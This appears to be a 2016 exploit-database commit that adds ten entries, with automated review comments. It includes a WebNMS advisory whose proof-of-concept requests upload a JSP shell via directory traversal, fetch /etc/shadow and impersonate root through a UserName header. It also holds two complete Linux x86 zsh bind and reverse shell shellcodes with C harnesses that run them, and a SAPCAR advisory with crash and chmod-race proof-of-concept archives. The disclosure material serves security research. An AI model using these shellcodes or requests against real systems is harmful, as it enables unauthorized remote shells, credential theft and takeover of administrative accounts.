DB: 2016-08-11
10 new exploits
Nagios Network Analyzer 2.2.1 - Multiple CSRF
Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)
Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)
Microsoft Office Word 2007_2010_2013_2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)
vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF)
EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation
EyeLock nano NXT 3.5 - Local File Disclosure
EyeLock nano NXT 3.5 - Remote Root Exploit
WebNMS Framework Server 5.2 and 5.2 SP1 - Multiple Vulnerabilities
SAP SAPCAR - Multiple Vulnerabilities
parent 3b59d25c95
commit 832f9cf8b5
11 changed files with 1609 additions and 0 deletions
10
files.csv
|
@ -36370,3 +36370,13 @@ id,file,description,date,author,platform,type,port
|
|||
40218,platforms/php/webapps/40218.txt,"phpCollab CMS 2.5 - (emailusers.php) SQL Injection",2016-08-08,Vulnerability-Lab,php,webapps,80
|
||||
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
|
||||
40220,platforms/php/webapps/40220.txt,"WordPress Add From Server Plugin < 3.3.2 - (File Upload) CSRF",2016-08-08,"Edwin Molenaar",php,webapps,80
|
||||
40221,platforms/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple CSRF",2016-08-10,hyp3rlinx,php,webapps,80
|
||||
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40224,platforms/windows/dos/40224.txt,"Microsoft Office Word 2007_2010_2013_2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,"Sébastien Morin",windows,dos,0
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Preauth Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
|
||||
40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
|
||||
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
|
||||
40229,platforms/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2 and 5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",jsp,webapps,0
|
||||
40230,platforms/linux/dos/40230.txt,"SAP SAPCAR - Multiple Vulnerabilities",2016-08-10,"Core Security",linux,dos,0
|
||||
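Review bot: the port column is inconsistent for the web entries in this hunk: 40229 (WebNMS Framework Server, jsp/webapps) is filed with port 0 while the other webapps rows (40221, 40225, 40227, 40228) carry 80, and the 40229 advisory's proofs of concept are plain HTTP requests to /servlets/..., so 80 would match the existing convention. Two type-column choices also deserve a second look: 40230 (SAP SAPCAR) is classified linux/dos although its advisory lists a local privilege escalation via a chmod race (CVE-2016-5847) next to the crash, and 40224 is titled "Remote Code Execution" but filed as windows/dos. Minor: the 40223 title uses lowercase "port 9090" where 40222 uses "Port 9090".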
89
platforms/jsp/webapps/40229.txt
Executable file
|
@ -0,0 +1,89 @@
|
|||
>> Multiple vulnerabilities in WebNMS Framework Server 5.2 and 5.2 SP1
|
||||
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
|
||||
==========================================================================
|
||||
Disclosure: 04/07/2016 / Last updated: 08/08/2016
|
||||
|
||||
>> Background on the affected product:
|
||||
"WebNMS is an industry-leading framework for building network management applications. With over 25,000 deployments worldwide and in every Tier 1 Carrier, network equipment providers and service providers can customize, extend and rebrand WebNMS as a comprehensive Element Management System (EMS) or Network Management System (NMS).
|
||||
NOC Operators, Architects and Developers can customize the functional modules to fit their domain and network. Functional modules include Fault Correlation, Performance KPIs, Device Configuration, Service Provisioning and Security. WebNMS supports numerous Operating Systems, Application Servers, and databases."
|
||||
|
||||
|
||||
>> Summary:
|
||||
WebNMS contains three critical vulnerabilities that can be exploited by an unauthenticated attacker: one directory traversal that can be used to achieve remote code execution, another directory traversal that can be abused to download any text file in the system and the possibility to impersonate any user in the system. In addition, WebNMS also stores the user passwords in a file with a weak obfuscation algorithm that can be easily reversed.
|
||||
|
||||
A special thanks to the SecuriTeam Secure Disclosure programme (SSD), which performed the disclosure in a responsible manner to the affected vendor. This advisory can be seen in their blog at https://blogs.securiteam.com/index.php/archives/2712
|
||||
|
||||
Metasploit exploits for all vulnerabilities have also been released.
|
||||
|
||||
|
||||
>> Technical details:
|
||||
#1
|
||||
Vulnerability: Directory traversal in file upload functionality (leading to remote code execution)
|
||||
CVE-2016-6600
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker. See below for other constraints.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
The FileUploadServlet has a directory traversal vulnerability, that allows an unauthenticated attacker to upload a JSP file that executes on the server.
|
||||
To exploit this vulnerability, simply POST as per the proof of concept below. The directory traversal is in the "fileName" parameter.
|
||||
|
||||
POST /servlets/FileUploadServlet?fileName=../jsp/Login.jsp HTTP/1.1
|
||||
<JSP payload here>
|
||||
|
||||
There are two things to keep in mind for the upload to be successful:
|
||||
- Only text files can be uploaded, binary files will be mangled.
|
||||
- In order to achieve code execution without authentication, the files need to be dropped in ../jsp/ but they can only have the following names: either Login.jsp or a WebStartXXX.jsp, where XXX is any string of any length.
|
||||
|
||||
|
||||
#2
|
||||
Vulnerability: Directory traversal in file download functionality
|
||||
CVE-2016-6601
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker. Only text files can be downloaded properly, any binary file will get mangled by the servlet and downloaded incorrectly.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
The FetchFile servlet has a directory traversal vulnerability that can be abused by an unauthenticated attacker to download arbitrary files from the WebNMS host. The vulnerable parameter is "fileName" and a proof of concept is shown below.
|
||||
|
||||
GET /servlets/FetchFile?fileName=../../../etc/shadow
|
||||
|
||||
|
||||
#3
|
||||
Vulnerability: Weak obfuscation algorithm used to store passwords
|
||||
CVE-2016-6602
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
The ./conf/securitydbData.xml file (in the WebNMS WEB-INF directory) contains entries with all the usernames and passwords in the server:
|
||||
<DATA ownername="NULL" password="e8c89O1f" username="guest"/>
|
||||
<DATA ownername="NULL" password="d7963B4t" username="root"/>
|
||||
|
||||
The algorithm used to obfuscate is convoluted but easy to reverse engineer. The passwords above are "guest" for the "guest" user and "admin" for the "root" user. A Metasploit module implementing the deobfuscation algorithm has been released.
|
||||
|
||||
This vulnerability can be combined with #2 and allow an unauthenticated attacker to obtain credentials for all user accounts:
|
||||
GET /servlets/FetchFile?fileName=conf/securitydbData.xml
|
||||
|
||||
|
||||
#4
|
||||
Vulnerability: User account impersonation / hijacking
|
||||
CVE-2016-6603
|
||||
Attack Vector: Remote
|
||||
Constraints: Can be exploited by an unauthenticated attacker.
|
||||
Affected versions: unknown, at least 5.2 and 5.2 SP1
|
||||
|
||||
It is possible to impersonate any user in WebNMS by simply setting the "UserName" HTTP header when making a request, which will return a valid authenticated session cookie. This allows an unauthenticated attacker to impersonate the superuser ("root") and perform administrative actions. The proof of concept is shown below:
|
||||
|
||||
GET /servlets/GetChallengeServlet HTTP/1.1
|
||||
UserName: root
|
||||
|
||||
This returns the cookie "SessionId=0033C8CFFE37EB6093849CBA4BF2CAF3;" which is a valid, JSESSIONID cookie authenticated as the "root" user. This can then be used to login to the WebNMS Framework Server by simply setting the cookie and browsing to any page.
|
||||
|
||||
|
||||
>> Fix:
|
||||
Since the vendor did not respond to any contacts attempted by Beyond Security and its SSD programme, it is not known whether a fixed version of WebNMS Framework Server has been released. It is highly recommended not to expose the server to any untrusted networks (such as the Internet).
|
||||
|
||||
|
||||
================
|
||||
Agile Information Security Limited
|
||||
http://www.agileinfosec.co.uk/
|
||||
>> Enabling secure digital business >>
|
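Review bot: the dates at the top use an ambiguous numeric format ("Disclosure: 04/07/2016 / Last updated: 08/08/2016") that reads as either 4 July or 7 April; the CVE and version data elsewhere in the file are precise, and files.csv records 2016-08-10, so ISO dates would remove the ambiguity. The >> Fix section offers only "do not expose the server"; since #4 (CVE-2016-6603) shows GetChallengeServlet trusting a client-supplied "UserName" header, the advisory could add the interim mitigation of having a front-end proxy strip that header from inbound requests, and for #3 it could state that the securitydbData.xml obfuscation gives no protection once #2 (CVE-2016-6601) lets the file be fetched, so every account listed there should be treated as compromised and its password rotated. A small labelling point: #3 is marked "Attack Vector: Remote" although the weak obfuscation is a storage weakness that only becomes remotely reachable through #2, as the text itself says two paragraphs later.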
190
platforms/lin_x86/shellcode/40222.c
Executable file
|
@ -0,0 +1,190 @@
|
|||
/*
|
||||
|
||||
;
|
||||
; Linux x86
|
||||
; Author: thryb
|
||||
; Date: 13-07-16
|
||||
; Purpose: Bind /bin/zsh to TCP port 9090
|
||||
; Size: 96 bytes
|
||||
; ID: SLAE-770
|
||||
; Git: https://www.github.com/thryb/SLAE-770
|
||||
;
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
_start:
|
||||
|
||||
xor eax, eax ; cleaning registers for sanity
|
||||
xor ebx, ebx
|
||||
xor edx, edx
|
||||
xor edi, edi
|
||||
|
||||
; 1 - create socket
|
||||
; socket(AF_INET, SOCK_STREAM, 0);
|
||||
; #define SYS_SOCKET 1 // sys_socket(2)
|
||||
|
||||
push eax ; null
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
mov bl, 0x1 ; socketcall() socket = 1
|
||||
push byte 0x1 ; stack = 0, 1
|
||||
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
|
||||
mov ecx, esp ; mov stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
; 2 - Bind port
|
||||
; bind(fd, (struct sockaddr *) &s_addr, 16);
|
||||
; #define SYS_BIND 2 // sys_bind(2)
|
||||
|
||||
xchg edi, eax ; transfer fd to edi
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
pop ebx ; sys_bind = 2
|
||||
pop esi ; = 1
|
||||
push edx ; stack = [0]
|
||||
push word 0x8223 ; stack = [0, port_num]
|
||||
push word bx ; stack = [0, port_num, 2]
|
||||
push byte 16 ; stack = [0, port_num, 2], 16
|
||||
push ecx ; stack = [0, port_num, 2], 16, pointer
|
||||
push edi ; stack = [0, port_num, 2], 16, *ptr, fd
|
||||
mov ecx, esp ; move stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
; 3 - Listen
|
||||
; listen(fd, 1);
|
||||
; #define SYS_LISTEN 4 // sys_listen(2)
|
||||
|
||||
pop edx ; save fd
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
add bl, 0x2 ; bl + 2 (bl 2 from bind)
|
||||
int 0x80 ; init
|
||||
|
||||
; 4 - Accept
|
||||
; accept(fd, NULL, NULL);
|
||||
; #define SYS_ACCEPT 5 // sys_accept(2)
|
||||
|
||||
push eax ; 0 - NULL
|
||||
push eax ; 0 - NULL
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
inc ebx ; make 5 for listen (4 from listen)
|
||||
push edx ; push fd on stack
|
||||
mov ecx, esp ; move stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
; 5 - dup
|
||||
; sys_dup2 = 63 = 0x3f
|
||||
|
||||
xchg eax, ebx ; ebx = fd / eax = 5
|
||||
xor ecx, ecx ; NULL ecx
|
||||
add cl, 0x2 ; add 2 to counter
|
||||
|
||||
dup2: ; STDIN, STDOUT, STDERR
|
||||
mov al, 0x3f ; sys_dup2
|
||||
int 0x80 ; init
|
||||
dec cl ; decrement counter
|
||||
jns dup2 ; Jump on No Sign (Positive)
|
||||
|
||||
; 6 - execve /bin/zsh
|
||||
; normal execve shell exec
|
||||
|
||||
push eax
|
||||
push 0x68737a2f ; hsz/
|
||||
push 0x6e69622f ; nib/
|
||||
|
||||
mov ebx, esp
|
||||
|
||||
push eax
|
||||
mov edx, esp
|
||||
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
|
||||
mov al, 0xb ; sys_execve (11)
|
||||
int 0x80 ; init
|
||||
|
||||
============================================================================================================
|
||||
|
||||
No NULL
|
||||
|
||||
./bind-sh-tcp-9090: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: 31 c0 xor %eax,%eax
|
||||
8048062: 31 db xor %ebx,%ebx
|
||||
8048064: 31 d2 xor %edx,%edx
|
||||
8048066: 31 ff xor %edi,%edi
|
||||
8048068: 50 push %eax
|
||||
8048069: b0 66 mov $0x66,%al
|
||||
804806b: b3 01 mov $0x1,%bl
|
||||
804806d: 6a 01 push $0x1
|
||||
804806f: 6a 02 push $0x2
|
||||
8048071: 89 e1 mov %esp,%ecx
|
||||
8048073: cd 80 int $0x80
|
||||
8048075: 97 xchg %eax,%edi
|
||||
8048076: b0 66 mov $0x66,%al
|
||||
8048078: 5b pop %ebx
|
||||
8048079: 5e pop %esi
|
||||
804807a: 52 push %edx
|
||||
804807b: 66 68 23 82 pushw $0x8223
|
||||
804807f: 66 53 push %bx
|
||||
8048081: 6a 10 push $0x10
|
||||
8048083: 51 push %ecx
|
||||
8048084: 57 push %edi
|
||||
8048085: 89 e1 mov %esp,%ecx
|
||||
8048087: cd 80 int $0x80
|
||||
8048089: 5a pop %edx
|
||||
804808a: b0 66 mov $0x66,%al
|
||||
804808c: 80 c3 02 add $0x2,%bl
|
||||
804808f: cd 80 int $0x80
|
||||
8048091: 50 push %eax
|
||||
8048092: 50 push %eax
|
||||
8048093: b0 66 mov $0x66,%al
|
||||
8048095: 43 inc %ebx
|
||||
8048096: 52 push %edx
|
||||
8048097: 89 e1 mov %esp,%ecx
|
||||
8048099: cd 80 int $0x80
|
||||
804809b: 93 xchg %eax,%ebx
|
||||
804809c: 31 c9 xor %ecx,%ecx
|
||||
804809e: 80 c1 02 add $0x2,%cl
|
||||
|
||||
080480a1 <dup2>:
|
||||
80480a1: b0 3f mov $0x3f,%al
|
||||
80480a3: cd 80 int $0x80
|
||||
80480a5: fe c9 dec %cl
|
||||
80480a7: 79 f8 jns 80480a1 <dup2>
|
||||
80480a9: 50 push %eax
|
||||
80480aa: 68 2f 7a 73 68 push $0x68737a2f
|
||||
80480af: 68 2f 62 69 6e push $0x6e69622f
|
||||
80480b4: 89 e3 mov %esp,%ebx
|
||||
80480b6: 50 push %eax
|
||||
80480b7: 89 e2 mov %esp,%edx
|
||||
80480b9: 53 push %ebx
|
||||
80480ba: 89 e1 mov %esp,%ecx
|
||||
80480bc: b0 0b mov $0xb,%al
|
||||
80480be: cd 80 int $0x80
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\x31\xc0\x31\xdb\x31\xd2\x31\xff\x50\xb0\x66\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\xb0\x66\x5b\x5e\x52\x66\x68"
|
||||
// ==== Port ====
|
||||
"\x23\x82"
|
||||
// ==============
|
||||
"\x66\x53\x6a\x10\x51\x57\x89\xe1\xcd\x80\x5a\xb0\x66\x80\xc3\x02\xcd\x80\x50\x50\xb0\x66\x43\x52\x89\xe1\xcd\x80\x93\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
|
||||
|
||||
main()
|
||||
{
|
||||
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
|
||||
int (*ret)() = (int(*)())code;
|
||||
|
||||
ret();
|
||||
|
||||
}
|
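Review bot: the comment on the accept step, `inc ebx ; make 5 for listen (4 from listen)`, should say "make 5 for accept": ebx carries the socketcall sub-function number, 4 for listen, and the increment selects accept (SYS_ACCEPT 5, as the header comment directly above it states). The C harness has two portability defects: `main()` is declared without a return type (implicit int is not valid C99 or later), and `strlen(code)` returns size_t but is printed with `%d`; `int main(void)` and `%zu` fix both. The bind step's `push word 0x8223` would also benefit from a `; 9090` comment like the one 40223.c puts on its port push, ideally noting that the two bytes are the port in network byte order, since the `// ==== Port ====` marker in the C array does not say which byte order a reader would need to use.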
158
platforms/lin_x86/shellcode/40223.c
Executable file
|
@ -0,0 +1,158 @@
|
|||
/*
|
||||
|
||||
;
|
||||
; Linux x86
|
||||
; Author: thryb
|
||||
; Date: 21-07-16
|
||||
; Purpose: Reverse /bin/zsh to TCP port 9090
|
||||
; Size: 80 bytes
|
||||
; ID: SLAE-770
|
||||
; Git: https://www.github.com/thryb/SLAE-770
|
||||
;
|
||||
|
||||
|
||||
global _start
|
||||
|
||||
section .text
|
||||
|
||||
_start:
|
||||
|
||||
xor eax, eax ; cleaning registers
|
||||
xor ebx, ebx
|
||||
|
||||
; 1 - create socket
|
||||
; socket(AF_INET, SOCK_STREAM, 0);
|
||||
; #define SYS_SOCKET 1 // sys_socket(2)
|
||||
push eax ; null terminate
|
||||
push byte 0x1 ; stack = 0, 1
|
||||
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
mov bl, 0x1 ; socketcall() socket = 1
|
||||
mov ecx, esp ; mv stack ptr into ecx
|
||||
int 0x80 ; init
|
||||
|
||||
xchg esi, eax ; saving sockfd
|
||||
|
||||
; 2 - Connect
|
||||
; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
|
||||
|
||||
mov al, 0x66 ; sys_socketcall = 102
|
||||
add ebx, 0x2 ; sys_connect = 3
|
||||
push 0xefffff7f ; 127.255.255.254 (ip2shell.py)
|
||||
push word 0x8223 ; 9090 (port2shell.py)
|
||||
push word 0x2 ; 2 AF_INET
|
||||
mov ecx, esp ; mv stack ptr to ecx
|
||||
push 0x10 ; addr leght 16
|
||||
push ecx ; ptr address
|
||||
push esi ; fd
|
||||
mov ecx, esp ; mv final stack ptr to ecx
|
||||
int 0x80 ; init
|
||||
|
||||
xchg eax, esi ; save sockfd
|
||||
|
||||
; 3 - dup
|
||||
; sys_dup2 = 63 = 0x3f
|
||||
|
||||
xor ecx, ecx ; NULL ecx
|
||||
add cl, 0x2 ; add 2 to counter
|
||||
|
||||
dup2: ; STDIN, STDOUT, STDERR
|
||||
mov al, 0x3f ; sys_dup2
|
||||
int 0x80 ; init
|
||||
dec cl ; decrement counter
|
||||
jns dup2 ; Jump on No Sign (Positive)
|
||||
|
||||
; 4 - execve /bin/zsh
|
||||
; normal execve shell exec
|
||||
|
||||
push eax ; null
|
||||
push 0x68737a2f ; hsz/
|
||||
push 0x6e69622f ; nib/
|
||||
mov ebx, esp ; mv stack ptr to ebx
|
||||
push eax ; null
|
||||
push ebx ; push ptr addr
|
||||
mov ecx, esp ; mv new stack ptr to ecx
|
||||
mov al, 0xb ; sys_execve (11)
|
||||
int 0x80 ; init
|
||||
|
||||
|
||||
============================================================================================================
|
||||
|
||||
No NULL
|
||||
|
||||
./reverse-zsh-tcp-9090.bin: file format elf32-i386
|
||||
|
||||
|
||||
Disassembly of section .text:
|
||||
|
||||
08048060 <_start>:
|
||||
8048060: 31 c0 xor %eax,%eax
|
||||
8048062: 31 db xor %ebx,%ebx
|
||||
8048064: 50 push %eax
|
||||
8048065: 6a 01 push $0x1
|
||||
8048067: 6a 02 push $0x2
|
||||
8048069: b0 66 mov $0x66,%al
|
||||
804806b: b3 01 mov $0x1,%bl
|
||||
804806d: 89 e1 mov %esp,%ecx
|
||||
804806f: cd 80 int $0x80
|
||||
8048071: 96 xchg %eax,%esi
|
||||
8048072: b0 66 mov $0x66,%al
|
||||
8048074: 83 c3 02 add $0x2,%ebx
|
||||
8048077: 68 7f ff ff ef push $0xefffff7f
|
||||
804807c: 66 68 23 82 pushw $0x8223
|
||||
8048080: 66 6a 02 pushw $0x2
|
||||
8048083: 89 e1 mov %esp,%ecx
|
||||
8048085: 6a 10 push $0x10
|
||||
8048087: 51 push %ecx
|
||||
8048088: 56 push %esi
|
||||
8048089: 89 e1 mov %esp,%ecx
|
||||
804808b: cd 80 int $0x80
|
||||
804808d: 96 xchg %eax,%esi
|
||||
804808e: 31 c9 xor %ecx,%ecx
|
||||
8048090: 80 c1 02 add $0x2,%cl
|
||||
|
||||
08048093 <dup2>:
|
||||
8048093: b0 3f mov $0x3f,%al
|
||||
8048095: cd 80 int $0x80
|
||||
8048097: fe c9 dec %cl
|
||||
8048099: 79 f8 jns 8048093 <dup2>
|
||||
804809b: 50 push %eax
|
||||
804809c: 68 2f 7a 73 68 push $0x68737a2f
|
||||
80480a1: 68 2f 62 69 6e push $0x6e69622f
|
||||
80480a6: 89 e3 mov %esp,%ebx
|
||||
80480a8: 50 push %eax
|
||||
80480a9: 53 push %ebx
|
||||
80480aa: 89 e1 mov %esp,%ecx
|
||||
80480ac: b0 0b mov $0xb,%al
|
||||
80480ae: cd 80 int $0x80
|
||||
|
||||
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char code[] = \
|
||||
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"
|
||||
|
||||
// Replace IP here (use ip2shell.py to generate IP).
|
||||
"\x7f\xff\xff\xef"
|
||||
// *****************
|
||||
|
||||
"\x66\x68"
|
||||
|
||||
// Replace port here (use port2shell.py to generate IP).
|
||||
"\x23\x82"
|
||||
// *****************
|
||||
|
||||
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
|
||||
main()
|
||||
{
|
||||
|
||||
printf("Shellcode Length: %d\n", strlen(code));
|
||||
|
||||
int (*ret)() = (int(*)())code;
|
||||
|
||||
ret();
|
||||
|
||||
}
|
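Review bot: this file will not compile as committed: the `unsigned char code[]` initializer ends at the final string segment (`...\x89\xe1\xb0\x0b\xcd\x80"`) with no terminating semicolon before `main()`, which the 40222.c version of the same harness does have. There is also an undocumented assumption in the dup2 loop: unlike the bind shell, which does `xchg eax, ebx` after accept so that ebx holds the connected descriptor, this code enters the loop with ebx still equal to 3 (the sys_connect number left by `add ebx, 0x2`), and `xchg eax, esi ; save sockfd` only moves the descriptor into eax, where `mov al, 0x3f` immediately overwrites it. The duplicated descriptor is therefore always 3, which is the socket only when the process had exactly stdin, stdout and stderr open when socket() was called; the comment should state that assumption or the code should handle the descriptor the way 40222.c does. Minor: the comment "use port2shell.py to generate IP" on the port bytes should read "generate port", and `main()`/`%d` have the same return-type and size_t issues noted for 40222.c.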
142
platforms/linux/dos/40230.txt
Executable file
|
@ -0,0 +1,142 @@
|
|||
1. Advisory Information
|
||||
|
||||
Title: SAP CAR Multiple Vulnerabilities
|
||||
Advisory ID: CORE-2016-0006
|
||||
Advisory URL: http://www.coresecurity.com/advisories/sap-car-multiple-vulnerabilities
|
||||
Date published: 2016-08-09
|
||||
Date of last update: 2016-08-09
|
||||
Vendors contacted: SAP
|
||||
Release mode: Coordinated release
|
||||
|
||||
2. Vulnerability Information
|
||||
|
||||
Class: Unchecked Return Value [CWE-252], TOCTOU Race Condition [CWE-367]
|
||||
Impact: Denial of service, Security bypass
|
||||
Remotely Exploitable: No
|
||||
Locally Exploitable: Yes
|
||||
CVE Name: CVE-2016-5845, CVE-2016-5847
|
||||
|
||||
3. Vulnerability Description
|
||||
|
||||
SAP [1] distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to local denial of service conditions or privilege escalation.
|
||||
|
||||
4. Vulnerable Packages
|
||||
|
||||
SAPCAR archive tool
|
||||
Other products and versions might be affected, but they were not tested.
|
||||
|
||||
5. Vendor Information, Solutions and Workarounds
|
||||
|
||||
SAP published the following Security Notes:
|
||||
|
||||
2312905
|
||||
2327384
|
||||
|
||||
6. Credits
|
||||
|
||||
This vulnerability was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
|
||||
|
||||
7. Technical Description / Proof of Concept Code
|
||||
|
||||
SAP distributes software and packages using an archive program called SAPCAR. This program uses a custom archive file format. Vulnerabilities were found in the extraction of specially crafted archive files, that could lead to denial of service conditions or escalation of privileges.
|
||||
|
||||
The code that handles the extraction of archive files is prone to privilege escalation and denial of service vulnerabilities.
|
||||
|
||||
7.1. Denial of service via invalid file names
|
||||
|
||||
[CVE-2016-5845] Denial of service vulnerability due the SAPCAR program not checking the return value of file operations when extracting files. This might result in the program crashing when trying to extract files from an specially crafted archive file that contains invalid file names for the target platform. Of special interest are applications or solutions that makes use of SAPCAR in an automated way.
|
||||
|
||||
The following is a proof of concept to demonstrate the vulnerability:
|
||||
|
||||
|
||||
$ xxd SAPCAR_crash.SAR
|
||||
0000000: 4341 5220 322e 3031 4452 0081 0000 0f00 CAR 2.01DR......
|
||||
0000010: 0000 0000 0000 0000 0000 d4f8 e555 0000 .............U..
|
||||
0000020: 0000 0000 0000 0000 1000 696e 7075 742d ..........input-
|
||||
0000030: 6469 722f 696e 7090 7400 4544 1a00 0000 dir/inp.t.ED....
|
||||
0000040: 0f00 0000 121f 9d02 7bc1 23b9 a90a 25a9 ........{.#...%.
|
||||
0000050: 1525 0a69 9939 a95c 0000 857f b95a .%.i.9.\.....Z
|
||||
|
||||
$ ./SAPCAR -dvf SAPCAR_crash.SAR
|
||||
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
|
||||
d input-dir/inp#t
|
||||
SAPCAR: checksum error in input-dir/inp#t (error 12). No such file or director
|
||||
|
||||
$ ./SAPCAR -xvf SAPCAR_crash.SAR
|
||||
SAPCAR: processing archive SAPCAR_crash.SAR (version 2.01)
|
||||
x input-dir/inp#t
|
||||
Segmentation fault
|
||||
|
||||
7.2. Race condition on permission change
|
||||
|
||||
[CVE-2016-5847] Race condition vulnerability due to the way the SAPCAR program change the permissions of extracted files. If a malicious local user has access to a directory where a user is extracting files using SAPCAR, the attacker might use this vulnerability to change the permissions of arbitrary files belonging to the user.
|
||||
|
||||
The SAPCAR program writes the file being extracted and after closing it, the program changes the permissions to the ones set on the archive file. There's a time gap between the creating of the file and the change of the permissions. During this time frame, a malicious local user can replace the extracted file with a hard link to a file belonging to another user, resulting in the SAPCAR program changing the permissions on the hard-linked file to be the same as that of the compressed file.
|
||||
|
||||
The following is a proof of concept to demonstrate the vulnerability:
|
||||
|
||||
|
||||
$ xxd SAPCAR_race_condition.SAR
|
||||
0000000: 4341 5220 322e 3031 5247 b481 0000 2b00 CAR 2.01RG....+.
|
||||
0000010: 0000 0000 0000 0000 0000 d023 5e56 0000 ...........#^V..
|
||||
0000020: 0000 0000 0000 0000 1000 7465 7374 5f73 ..........test_s
|
||||
0000030: 7472 696e 672e 7478 7400 4544 3500 0000 tring.txt.ED5...
|
||||
0000040: 2b00 0000 121f 9d02 7b21 19a9 0a85 a599 +.......{!......
|
||||
0000050: c9d9 0a49 45f9 e579 0a69 f915 0a59 a5b9 ...IE..y.i...Y..
|
||||
0000060: 05c5 0af9 65a9 450a 2540 e99c c4aa 4a85 ....e.E.%@....J.
|
||||
0000070: 94fc 7400 0008 08c6 b9 ..t......
|
||||
|
||||
$ ./SAPCAR -tvf SAPCAR_race_condition.SAR
|
||||
SAPCAR: processing archive SAPCAR_race_condition.SAR (version 2.01)
|
||||
-rw-rw-r-- 43 01 Dec 2015 19:48 test_string.txt
|
||||
|
||||
$ strace ./SAPCAR -xvf SAPCAR_race_condition.SAR
|
||||
execve("./SAPCAR", ["./SAPCAR", "-xvf", "SAPCAR_race_condition.SAR"], [/* 76 vars */]) = 0
|
||||
[..]
|
||||
open("test_string.txt", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
|
||||
mmap(NULL, 323584, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c4704000
|
||||
fstat(4, {st_mode=S_IFREG|0664, st_size=0, ...}) = 0
|
||||
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f98c475c000
|
||||
write(4, "The quick brown fox jumps over t"..., 43) = 43
|
||||
close(4) = 0
|
||||
munmap(0x7f98c475c000, 4096) = 0
|
||||
utime("test_string.txt", [2015/12/01-19:48:48, 2015/12/01-19:48:48]) = 0
|
||||
chmod("test_string.txt", 0664) = 0
|
||||
[..]
|
||||
|
||||
8. Report Timeline
|
||||
|
||||
2016-04-21: Core Security sent an initial notification to SAP.
|
||||
2016-04-22: SAP confirmed the reception of the email and requested the draft version of the advisory.
|
||||
